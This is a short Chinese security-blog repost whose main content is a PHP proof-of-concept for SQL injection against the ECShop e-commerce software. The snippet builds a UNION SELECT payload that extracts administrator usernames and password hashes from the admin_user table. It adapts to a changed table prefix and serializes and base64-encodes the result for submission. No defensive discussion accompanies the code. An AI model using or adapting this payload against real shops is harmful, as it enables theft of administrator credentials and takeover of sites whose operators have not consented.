【漏洞】ecshop前缀修改后的注入代码

admin 2021年4月3日19:10:20评论62 views字数 23阅读0分4秒阅读模式

解决ecshop数据库前缀修改后不能注入的问题

$p="ecs_";
$p=isset($_REQUEST['pre'])?$_REQUEST['pre']:$p;
$arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"') union select 1#"'),1 from ".$p."admin_user#"=>"1");
$exp = array("attr"=>$arr); 
$exp = base64_encode(serialize($exp));  
//echo $exp;
?>

文章来源于lcx.cc:【漏洞】ecshop前缀修改后的注入代码

相关推荐: 【VB】VB 时长转换/时间转换为*天*时*分*秒

    VB 时长转换/时间转换,VB 时长转换,VB 时间转换,VB 时长,VB 时间,VB 把时长转换为*天*时*分*秒,VB 时长转换为*天*时*分*秒,VB 时长转为*天*时*分*秒,VB 时间转为*天*时*分*秒,VB *天*时*分*秒,VB Tim…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:10:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】ecshop前缀修改后的注入代码https://cn-sec.com/archives/320057.html

发表评论

匿名网友 填写信息